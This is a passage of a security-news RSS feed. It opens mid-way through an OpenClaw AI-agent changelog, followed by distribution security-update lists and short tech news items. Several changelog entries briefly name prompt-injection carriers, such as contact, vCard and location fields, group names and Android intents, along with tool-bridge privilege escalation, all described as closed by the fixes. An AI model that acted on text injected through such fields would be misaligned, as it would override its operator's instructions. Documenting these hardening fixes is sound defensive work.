<li>Plugins/install: link the host OpenClaw package into external plugins that declare <code>openclaw</code> as a peer dependency, so peer-only plugin SDK imports resolve after install without bundling a duplicate host package. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313294513" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70462" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70462/hovercard" href="https://github.com/openclaw/openclaw/pull/70462">#70462</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anishesg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anishesg">@anishesg</a>.</li>
<li>Plugins/Windows: refresh the packaged plugin SDK alias in place during bundled runtime dependency repair, so gateway and CLI plugin startup no longer race on <code>ENOTEMPTY</code>/<code>EPERM</code> after same-guest npm updates.</li>
<li>Teams/security: require shared Bot Framework audience tokens to name the configured Teams app via verified <code>appid</code> or <code>azp</code>, blocking cross-bot token replay on the global audience. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317946331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70724/hovercard" href="https://github.com/openclaw/openclaw/pull/70724">#70724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: resolve bundled plugin Jiti loads relative to the target plugin module instead of the central loader, so Bun global installs no longer hang while discovering bundled image providers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307757270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70073/hovercard" href="https://github.com/openclaw/openclaw/pull/70073">#70073</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yidianyiko/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yidianyiko">@yidianyiko</a>.</li>
<li>Anthropic/CLI security: derive Claude CLI <code>bypassPermissions</code> from OpenClaw's existing YOLO exec policy, preserve explicit raw Claude <code>--permission-mode</code> overrides, and strip malformed permission-mode args instead of silently falling back to a bypass. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317943033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70723/hovercard" href="https://github.com/openclaw/openclaw/pull/70723">#70723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: require loopback-only cleartext gateway connections on Android manual and scanned routes, so private-LAN and link-local <code>ws://</code> endpoints now fail closed unless TLS is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317940763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70722" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70722/hovercard" href="https://github.com/openclaw/openclaw/pull/70722">#70722</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Pairing/security: require private-IP or loopback hosts for cleartext mobile pairing, and stop treating <code>.local</code> or dotless hostnames as safe cleartext endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317933544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70721/hovercard" href="https://github.com/openclaw/openclaw/pull/70721">#70721</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/security: stop setup-api lookup from falling back to the launch directory, so workspace-local <code>extensions/&lt;plugin&gt;/setup-api.*</code> files cannot be executed during provider setup resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317905776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70718" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70718/hovercard" href="https://github.com/openclaw/openclaw/pull/70718">#70718</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Approvals/security: require explicit chat exec-approval enablement instead of auto-enabling approval clients just because approvers resolve from config or owner allowlists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317765259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70715" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70715/hovercard" href="https://github.com/openclaw/openclaw/pull/70715">#70715</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/security: keep native slash-command channel policy from bypassing configured owner or member restrictions, while preserving channel-policy fallback when no stricter access rule exists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317763069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70711" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70711/hovercard" href="https://github.com/openclaw/openclaw/pull/70711">#70711</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: stop <code>ASK_OPENCLAW</code> intents from auto-sending injected prompts, so external app actions only prefill the draft instead of dispatching it immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317764736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70714" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70714/hovercard" href="https://github.com/openclaw/openclaw/pull/70714">#70714</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Secrets/Windows: strip UTF-8 BOMs from file-backed secrets and keep unavailable ACL checks fail-closed unless trusted file or exec providers explicitly opt into <code>allowInsecurePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317129545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70662" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70662/hovercard" href="https://github.com/openclaw/openclaw/pull/70662">#70662</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>Agents/image generation: escape ignored override values in tool warnings so parsed <code>MEDIA:</code> directives cannot be injected through unsupported model options. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317762579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70710" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70710/hovercard" href="https://github.com/openclaw/openclaw/pull/70710">#70710</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QQBot/security: require framework auth for <code>/bot-approve</code> so unauthorized QQ senders cannot change exec approval settings through the unauthenticated pre-dispatch slash-command path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317735442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70706/hovercard" href="https://github.com/openclaw/openclaw/pull/70706">#70706</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>MCP/tools: stop the ACPX OpenClaw tools bridge from listing or invoking owner-only tools such as <code>cron</code>, closing a privilege-escalation path for non-owner MCP callers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317612919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70698" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70698/hovercard" href="https://github.com/openclaw/openclaw/pull/70698">#70698</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu/onboarding: load Feishu setup surfaces through a setup-only barrel so first-run setup no longer imports Feishu's Lark SDK before bundled runtime deps are staged. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311786128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70339" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70339/hovercard" href="https://github.com/openclaw/openclaw/pull/70339">#70339</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrejtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrejtr">@andrejtr</a>.</li>
<li>Approvals/startup: let native approval handlers report ready after gateway authentication while replaying pending approvals in the background, so slow or failing replay delivery no longer blocks handler startup or amplifies reconnect storms.</li>
<li>WhatsApp/security: keep contact/vCard/location structured-object free text out of the inline message body and render it through fenced untrusted metadata JSON, limiting hidden prompt-injection payloads in names, phone fields, and location labels/comments.</li>
<li>Group-chat/security: keep channel-sourced group names and participant labels out of inline group system prompts and render them through fenced untrusted metadata JSON.</li>
<li>Agents/replay: preserve Kimi-style <code>functions.&lt;name&gt;:&lt;index&gt;</code> tool-call IDs during strict replay sanitization so custom OpenAI-compatible Kimi routes keep multi-turn tool use intact. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317536165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70693" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70693/hovercard" href="https://github.com/openclaw/openclaw/pull/70693">#70693</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/geri4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/geri4">@geri4</a>.</li>
<li>Discord/replies: preserve final reply permission context through outbound delivery so Discord replies keep the same channel/member routing rules at send time.</li>
<li>Plugins/startup: restore bundled plugin <code>openclaw/plugin-sdk/*</code> resolution from packaged installs and external runtime-deps stage roots, so Telegram/Discord no longer crash-loop with <code>Cannot find package 'openclaw'</code> after missing dependency repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319745436" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70852" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70852/hovercard" href="https://github.com/openclaw/openclaw/pull/70852">#70852</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonemacario/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonemacario">@simonemacario</a>.</li>
<li>CLI/Claude: run the same prompt-build hooks and trigger/channel context on <code>claude-cli</code> turns as on direct embedded runs, keeping Claude Code sessions aligned with OpenClaw workspace identity, routing, and hook-driven prompt mutations. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316475365" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70625" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70625/hovercard" href="https://github.com/openclaw/openclaw/pull/70625">#70625</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Discord/plugin startup: keep subagent hooks lazy behind Discord's channel entry so packaged entry imports stay narrow and report import failures with the channel id and entry path.</li>
<li>Memory/doctor: keep root durable memory canonicalized on <code>MEMORY.md</code>, stop treating lowercase <code>memory.md</code> as a runtime fallback, and let <code>openclaw doctor --fix</code> merge true split-brain root files into <code>MEMORY.md</code> with a backup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316390163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70621/hovercard" href="https://github.com/openclaw/openclaw/pull/70621">#70621</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Providers/Anthropic Vertex: restore ADC-backed model discovery after the lightweight provider-discovery path by resolving emitted discovery entries, exposing synthetic auth on bootstrap discovery, and honoring copied env snapshots when probing the default GCP ADC path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251357682" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65715" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65715/hovercard" href="https://github.com/openclaw/openclaw/issues/65715">#65715</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251358554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65716/hovercard" href="https://github.com/openclaw/openclaw/pull/65716">#65716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/feiskyer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/feiskyer">@feiskyer</a>.</li>
<li>Codex harness/status: pin embedded harness selection per session, show active non-PI harness ids such as <code>codex</code> in <code>/status</code>, and keep legacy transcripts on PI until <code>/new</code> or <code>/reset</code> so config changes cannot hot-switch existing sessions.</li>
<li>Gateway/security: fail closed on agent-driven <code>gateway config.apply</code>/<code>config.patch</code> runtime edits by allowlisting a narrow set of agent-tunable prompt, model, and mention-gating paths (including Telegram topic-level <code>requireMention</code>) instead of relying on a hand-maintained denylist of protected subtrees that could miss new sensitive config keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317956002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70726" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70726/hovercard" href="https://github.com/openclaw/openclaw/pull/70726">#70726</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Webhooks/security: re-resolve <code>SecretRef</code>-backed webhook route secrets on each request so <code>openclaw secrets reload</code> revokes the previous secret immediately instead of waiting for a gateway restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317967302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70727" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70727/hovercard" href="https://github.com/openclaw/openclaw/pull/70727">#70727</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel and osbuild-composer), Debian (cpp-httplib, firefox-esr, gimp, and packagekit), Fedora (chromium, composer, libcap, pgadmin4, pie, python3-docs, python3.14, and sudo), Mageia (gvfs), Oracle (.NET 8.0, delve, freerdp, giflib, ImageMagick, kern...]]></description>
<link>https://tsecurity.de/de/3458228/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3458228/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 23 Apr 2026 15:26:37 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel and osbuild-composer), <b>Debian</b> (cpp-httplib, firefox-esr, gimp, and packagekit), <b>Fedora</b> (chromium, composer, libcap, pgadmin4, pie, python3-docs, python3.14, and sudo), <b>Mageia</b> (gvfs), <b>Oracle</b> (.NET 8.0, delve, freerdp, giflib, ImageMagick, kernel, OpenEXR, and osbuild-composer), <b>SUSE</b> (erlang, giflib, google-guest-agent, GraphicsMagick, ignition, imagemagick, kea, kernel, kissfft, libraw, libssh, ocaml-patch, opam, openCryptoki, openexr, openssl-1_1, tomcat, tomcat10, tomcat11, and tor), and <b>Ubuntu</b> (linux, linux-aws, linux-aws-5.4, linux-azure, linux-gcp, linux-gcp-5.4,
 linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm,
 linux-oracle, linux-oracle-5.4, linux-xilinx-zynqmp, linux-aws, linux-aws-6.17, linux-hwe-6.17, linux-oracle, linux-oracle-6.17, linux-azure, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-oracle-5.15, linux-azure-5.4, linux-azure-fips, linux-fips, linux-aws-fips, linux-azure-fips, linux-gcp-fips, linux-hwe-6.8, linux-ibm-6.8, linux-raspi, linux-oracle, linux-oracle-6.8, linux-raspi, linux-raspi-5.4, linux-raspi-realtime, packagekit, python-tornado, ruby-rack-session, slurm-llnl, and strongswan).]]></content:encoded>
</item>
<item>
<title><![CDATA[Was Booking.com hacked?]]></title>
<description><![CDATA[Yes, the popular online lodging reservations service provider confirmed a data breach earlier this month. Starting on April 12th, 2026, many people received emails from… The post Was Booking.com hacked? appeared first on Panda Security Mediacenter. This article has been…
Read more →
The post Was ...]]></description>
<link>https://tsecurity.de/de/3453785/it-security-nachrichten/was-bookingcom-hacked/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3453785/it-security-nachrichten/was-bookingcom-hacked/</guid>
<pubDate>Wed, 22 Apr 2026 09:21:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Yes, the popular online lodging reservations service provider confirmed a data breach earlier this month. Starting on April 12th, 2026, many people received emails from… The post Was Booking.com hacked? appeared first on Panda Security Mediacenter. This article has been…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/was-booking-com-hacked/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/was-booking-com-hacked/">Was Booking.com hacked?</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 8.0, .NET 9.0, freerdp, libarchive, and thunderbird), Debian (chromium, openssh, and thunderbird), Fedora (aurorae, bluedevil, breeze-gtk, buildah, cockpit, extra-cmake-modules, flatpak-kcm, grub2-breeze-theme, kactivitymanagerd, kcm_wacomtable...]]></description>
<link>https://tsecurity.de/de/3442222/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3442222/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 17 Apr 2026 15:45:35 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 8.0, .NET 9.0, freerdp, libarchive, and thunderbird), <b>Debian</b> (chromium, openssh, and thunderbird), <b>Fedora</b> (aurorae, bluedevil, breeze-gtk, buildah, cockpit, extra-cmake-modules, flatpak-kcm, grub2-breeze-theme, kactivitymanagerd, kcm_wacomtablet, kde-cli-tools, kde-gtk-config, kdecoration, kdeplasma-addons, kf6, kf6-attica, kf6-baloo, kf6-bluez-qt, kf6-breeze-icons, kf6-frameworkintegration, kf6-kapidox, kf6-karchive, kf6-kauth, kf6-kbookmarks, kf6-kcalendarcore, kf6-kcmutils, kf6-kcodecs, kf6-kcolorscheme, kf6-kcompletion, kf6-kconfig, kf6-kconfigwidgets, kf6-kcontacts, kf6-kcoreaddons, kf6-kcrash, kf6-kdav, kf6-kdbusaddons, kf6-kdeclarative, kf6-kded, kf6-kdesu, kf6-kdnssd, kf6-kdoctools, kf6-kfilemetadata, kf6-kglobalaccel, kf6-kguiaddons, kf6-kholidays, kf6-ki18n, kf6-kiconthemes, kf6-kidletime, kf6-kimageformats, kf6-kio, kf6-kirigami, kf6-kitemmodels, kf6-kitemviews, kf6-kjobwidgets, kf6-knewstuff, kf6-knotifications, kf6-knotifyconfig, kf6-kpackage, kf6-kparts, kf6-kpeople, kf6-kplotting, kf6-kpty, kf6-kquickcharts, kf6-krunner, kf6-kservice, kf6-kstatusnotifieritem, kf6-ksvg, kf6-ktexteditor, kf6-ktexttemplate, kf6-ktextwidgets, kf6-kunitconversion, kf6-kuserfeedback, kf6-kwallet, kf6-kwidgetsaddons, kf6-kwindowsystem, kf6-kxmlgui, kf6-modemmanager-qt, kf6-networkmanager-qt, kf6-prison, kf6-purpose, kf6-qqc2-desktop-style, kf6-solid, kf6-sonnet, kf6-syndication, kf6-syntax-highlighting, kf6-threadweaver, kgamma, kglobalacceld, kinfocenter, kmenuedit, knighttime, kpipewire, krdp, kscreen, kscreenlocker, ksshaskpass, ksystemstats, kwayland, kwayland-integration, kwin, kwin-x11, kwrited, layer-shell-qt, libexif, libkscreen, libksysguard, libplasma, nix, ocean-sound-theme, oxygen-sounds, pam-kwallet, plasma-activities, plasma-activities-stats, plasma-breeze, plasma-browser-integration, plasma-desktop, plasma-dialer, plasma-discover, plasma-disks, plasma-drkonqi, plasma-firewall, plasma-integration, plasma-keyboard, plasma-login-manager, plasma-milou, plasma-mobile, plasma-nano, plasma-nm, plasma-oxygen, plasma-pa, plasma-print-manager, plasma-sdk, plasma-setup, plasma-systemmonitor, plasma-systemsettings, plasma-thunderbolt, plasma-vault, plasma-welcome, plasma-workspace, plasma-workspace-wallpapers, plasma-workspace-x11, plasma5support, plymouth-kcm, plymouth-theme-breeze, podman, polkit-kde, powerdevil, qqc2-breeze-style, sddm-kcm, skopeo, spacebar, spectacle, thunderbird, and xdg-desktop-portal-kde), <b>Mageia</b> (cockpit-338), <b>Oracle</b> (capstone, cockpit, firefox, fontforge, freerdp, golang-github-openprinting-ipp-usb, kernel, nghttp2, nodejs:20, nodejs:24, openexr, and squid), <b>Red Hat</b> (gnutls, libarchive, libpng, libpng12, libpng15, libtiff, libvpx, libxslt, multiple packages, python, python3, python3.11, python3.12, and python3.9), <b>Slackware</b> (libxml2), <b>SUSE</b> (apache-pdfbox, azure-storage-azcopy, corosync, cups, freerdp, iproute2, libsdb2_4_2, libtpms, NetworkManager, openssl-1_1, ovmf, plexus-utils, python, python-CairoSVG, python-jwcrypto, python-PyJWT, python-pyOpenSSL, python-urllib3, python3, python314, rust1.93, shim, smc-tools, terraform-provider-local, terraform-provider-random, terraform-provider-tls, thunderbird, tiff, util-linux, and vim), and <b>Ubuntu</b> (libowasp-esapi-java, linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gke, linux-gkeop, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle, linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gke, linux-gkeop, linux-ibm, linux-lowlatency, linux-lowlatency-hwe-6.8, linux, linux-realtime, linux-aws-fips, linux-fips, linux-gcp-fips, linux-fips, linux-gcp-fips, linux-gcp, linux-gcp-6.17, linux-hwe-5.15, linux-intel-iot-realtime, linux-realtime, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-nvidia-tegra, linux-nvidia-tegra, linux-nvidia-tegra-igx, linux-realtime, linux-realtime-6.8, linux-realtime-6.17, ofono, and ruby-rack).]]></content:encoded>
</item>
<item>
<title><![CDATA[Framepipe now supports custom backgrounds, zoom, pipewire capture, and embedded realtime preview]]></title>
<description><![CDATA[hey, I posted about my gpu accelerated screen recorder here a while ago. I am writing a gui for it in iced.rs, it now supports embedded previews, with real-time config updates, I initially did it with an image widget but it caused flickering since it rendered every new frame in a new wgpu texture...]]></description>
<link>https://tsecurity.de/de/3440515/linux-tipps/framepipe-now-supports-custom-backgrounds-zoom-pipewire-capture-and-embedded-realtime-preview/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3440515/linux-tipps/framepipe-now-supports-custom-backgrounds-zoom-pipewire-capture-and-embedded-realtime-preview/</guid>
<pubDate>Fri, 17 Apr 2026 03:53:55 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>hey, I posted about my gpu accelerated screen recorder here a while ago. I am writing a gui for it in <a href="http://iced.rs/">iced.rs</a>, it now supports embedded previews, with real-time config updates, I initially did it with an image widget but it caused flickering since it rendered every new frame in a new wgpu texture and made an extra unnecessary cpu copy. So, I moved it to a custom shader widget which renders a persistent wgpu texture instead. I also added support for backgrounds! and zoom. And it also supports xdg-desktop-portal/pipewire capture now.</p> <p><a href="https://youtu.be/zAJ6gD-stM0">https://youtu.be/zAJ6gD-stM0</a></p> <p><a href="https://github.com/martian0x80/framepipe/">https://github.com/martian0x80/framepipe/</a> </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/garamgaramsamose"> /u/garamgaramsamose </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1sneq83/framepipe_now_supports_custom_backgrounds_zoom/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1sneq83/framepipe_now_supports_custom_backgrounds_zoom/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (container-tools:rhel8, fontforge, freerdp, go-toolset:rhel8, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, and gstreamer1-plugins-good, kernel, kernel-rt, libtasn1, mariadb:10.11, mysql:8.4, nginx:1.24, openssh, pcs, python-jinja2, python3.9...]]></description>
<link>https://tsecurity.de/de/3423760/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3423760/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 10 Apr 2026 15:26:49 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (container-tools:rhel8, fontforge, freerdp, go-toolset:rhel8, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, and gstreamer1-plugins-good, kernel, kernel-rt, libtasn1, mariadb:10.11, mysql:8.4, nginx:1.24, openssh, pcs, python-jinja2, python3.9, ruby:3.1, vim, virt:rhel and virt-devel:rhel, and xmlrpc-c), <b>Debian</b> (libyaml-syck-perl and openssh), <b>Fedora</b> (cockpit, crun, dnsdist, doctl, fido-device-onboard, libcgif, libpng12, libpng15, mbedtls, opensc, and util-linux), <b>Red Hat</b> (git-lfs, go-toolset:rhel8, grafana, grafana-pcp, and rhc), <b>Slackware</b> (libpng), <b>SUSE</b> (389-ds, aws-c-event-stream, bind, cockpit, cockpit-repos, corepack24, dcmtk, dnsdist, docker-compose, expat, firefox, firefox-esr, gnome-online-accounts, gvfs, gnutls, jupyter-jupyterlab-templates, kea, libIex-3_4-33, libpng16, mapserver, perl-XML-Parser, postgresql13, postgresql16, python-Pillow, python311-lupa, thunderbird, tigervnc, and tomcat10), and <b>Ubuntu</b> (linux-azure-fips, linux-hwe, linux-intel-iot-realtime, linux-nvidia-tegra-5.15, openssl, openssl1.0, and python-django).]]></content:encoded>
</item>
<item>
<title><![CDATA[A jury is about to decide the fate of Ticketmaster]]></title>
<description><![CDATA[Consumer complaints about Ticketmaster are so voluminous at state attorneys general offices that Pennsylvania's comes with an explicit plea for residents lodging a grievance about the company to be patient for a response. That kind of pressure has driven more than 30 states to push forward with c...]]></description>
<link>https://tsecurity.de/de/3420697/it-nachrichten/a-jury-is-about-to-decide-the-fate-of-ticketmaster/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3420697/it-nachrichten/a-jury-is-about-to-decide-the-fate-of-ticketmaster/</guid>
<pubDate>Thu, 09 Apr 2026 16:02:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
